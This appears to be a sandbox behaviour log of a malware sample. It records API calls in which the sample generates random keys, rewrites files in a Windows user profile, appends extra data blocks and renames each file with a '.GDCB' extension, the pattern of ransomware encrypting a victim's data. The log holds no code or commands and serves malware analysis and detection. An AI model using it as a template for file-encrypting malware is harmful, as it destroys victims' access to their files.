File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\profiles.ini, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\profiles.ini, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\profiles.ini.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\PP7PZiVZnjg.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\PP7PZiVZnjg.gif, size = 1048576, size_out = 72364 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\PP7PZiVZnjg.gif, size = 72368 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\PP7PZiVZnjg.gif, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\PP7PZiVZnjg.gif, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\PP7PZiVZnjg.gif, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\PP7PZiVZnjg.gif.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\py_6.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\py_6.pdf, size = 1048576, size_out = 11696 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\py_6.pdf, size = 11696 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\py_6.pdf, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\py_6.pdf, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\py_6.pdf, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\py_6.pdf.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\QvlruVqbW5.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\QvlruVqbW5.mp3, size = 1048576, size_out = 32913 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\QvlruVqbW5.mp3, size = 32928 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\QvlruVqbW5.mp3, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\QvlruVqbW5.mp3, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\QvlruVqbW5.mp3, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\QvlruVqbW5.mp3.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\rDJeorfWLmIUKr-wJ-G.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\rDJeorfWLmIUKr-wJ-G.mp3, size = 1048576, size_out = 28058 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\rDJeorfWLmIUKr-wJ-G.mp3, size = 28064 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\rDJeorfWLmIUKr-wJ-G.mp3, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\rDJeorfWLmIUKr-wJ-G.mp3, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\rDJeorfWLmIUKr-wJ-G.mp3, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\rDJeorfWLmIUKr-wJ-G.mp3.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\s-oOZLE.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\s-oOZLE.avi, size = 1048576, size_out = 19248 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\s-oOZLE.avi, size = 19248 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\s-oOZLE.avi, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\s-oOZLE.avi, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\s-oOZLE.avi, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\s-oOZLE.avi.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\sao0lzDqm lb1JO.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\sao0lzDqm lb1JO.bmp, size = 1048576, size_out = 77525 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\sao0lzDqm lb1JO.bmp, size = 77536 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\sao0lzDqm lb1JO.bmp, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\sao0lzDqm lb1JO.bmp, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\sao0lzDqm lb1JO.bmp, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\sao0lzDqm lb1JO.bmp.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Skype\RootTools\roottools.conf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Skype\RootTools\roottools.conf, size = 1048576, size_out = 76 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Skype\RootTools\roottools.conf, size = 80 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Skype\RootTools\roottools.conf, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Skype\RootTools\roottools.conf, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Skype\RootTools\roottools.conf, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Skype\RootTools\roottools.conf.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\srk1.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\srk1.flv, size = 1048576, size_out = 68427 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\srk1.flv, size = 68432 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\srk1.flv, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\srk1.flv, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\srk1.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\srk1.flv.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\UFabmkAU-rJObGOdjy23.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\UFabmkAU-rJObGOdjy23.swf, size = 1048576, size_out = 23642 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\UFabmkAU-rJObGOdjy23.swf, size = 23648 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\UFabmkAU-rJObGOdjy23.swf, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\UFabmkAU-rJObGOdjy23.swf, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\UFabmkAU-rJObGOdjy23.swf, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\UFabmkAU-rJObGOdjy23.swf.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\XDfXtYW.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\XDfXtYW.m4a, size = 1048576, size_out = 94244 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\XDfXtYW.m4a, size = 94256 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\XDfXtYW.m4a, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\XDfXtYW.m4a, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\XDfXtYW.m4a, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\XDfXtYW.m4a.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\xX9L.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\xX9L.avi, size = 1048576, size_out = 75504 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\xX9L.avi, size = 75504 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\xX9L.avi, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\xX9L.avi, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\xX9L.avi, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\xX9L.avi.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\X_3ykeU9F6OZxw.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\X_3ykeU9F6OZxw.swf, size = 1048576, size_out = 4063 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\X_3ykeU9F6OZxw.swf, size = 4064 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\X_3ykeU9F6OZxw.swf, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\X_3ykeU9F6OZxw.swf, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\X_3ykeU9F6OZxw.swf, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\X_3ykeU9F6OZxw.swf.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\yzRhhBR e0eN.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\yzRhhBR e0eN.wav, size = 1048576, size_out = 22729 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\yzRhhBR e0eN.wav, size = 22736 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\yzRhhBR e0eN.wav, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\yzRhhBR e0eN.wav, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\yzRhhBR e0eN.wav, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\yzRhhBR e0eN.wav.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\z5f8F.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\z5f8F.pdf, size = 1048576, size_out = 47617 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\z5f8F.pdf, size = 47632 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\z5f8F.pdf, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\z5f8F.pdf, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\z5f8F.pdf, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\z5f8F.pdf.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Contacts\Aclviho ASldjfl.contact, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Contacts\Aclviho ASldjfl.contact, size = 1048576, size_out = 1178 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Contacts\Aclviho ASldjfl.contact, size = 1184 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Contacts\Aclviho ASldjfl.contact, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Contacts\Aclviho ASldjfl.contact, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Contacts\Aclviho ASldjfl.contact, destination_filename = C:\Users\CIiHmnxMn6Ps\Contacts\Aclviho ASldjfl.contact.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Contacts\asdlfk poopvy.contact, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Contacts\asdlfk poopvy.contact, size = 1048576, size_out = 1171 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Contacts\asdlfk poopvy.contact, size = 1184 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Contacts\asdlfk poopvy.contact, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Contacts\asdlfk poopvy.contact, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Contacts\asdlfk poopvy.contact, destination_filename = C:\Users\CIiHmnxMn6Ps\Contacts\asdlfk poopvy.contact.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Contacts\chucu jadnvk.contact, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Contacts\chucu jadnvk.contact, size = 1048576, size_out = 1177 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Contacts\chucu jadnvk.contact, size = 1184 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Contacts\chucu jadnvk.contact, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Contacts\chucu jadnvk.contact, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Contacts\chucu jadnvk.contact, destination_filename = C:\Users\CIiHmnxMn6Ps\Contacts\chucu jadnvk.contact.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Contacts\lulcit amkdfe.contact, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Contacts\lulcit amkdfe.contact, size = 1048576, size_out = 1174 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Contacts\lulcit amkdfe.contact, size = 1184 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Contacts\lulcit amkdfe.contact, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Contacts\lulcit amkdfe.contact, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Contacts\lulcit amkdfe.contact, destination_filename = C:\Users\CIiHmnxMn6Ps\Contacts\lulcit amkdfe.contact.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Contacts\sikvnb huvuib.contact, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Contacts\sikvnb huvuib.contact, size = 1048576, size_out = 1311 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Contacts\sikvnb huvuib.contact, size = 1312 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Contacts\sikvnb huvuib.contact, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Contacts\sikvnb huvuib.contact, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Contacts\sikvnb huvuib.contact, destination_filename = C:\Users\CIiHmnxMn6Ps\Contacts\sikvnb huvuib.contact.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\-__krKwuDNCw7vix_s.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\-__krKwuDNCw7vix_s.wav, size = 1048576, size_out = 51873 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\-__krKwuDNCw7vix_s.wav, size = 51888 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\-__krKwuDNCw7vix_s.wav, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\-__krKwuDNCw7vix_s.wav, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\-__krKwuDNCw7vix_s.wav, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\-__krKwuDNCw7vix_s.wav.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
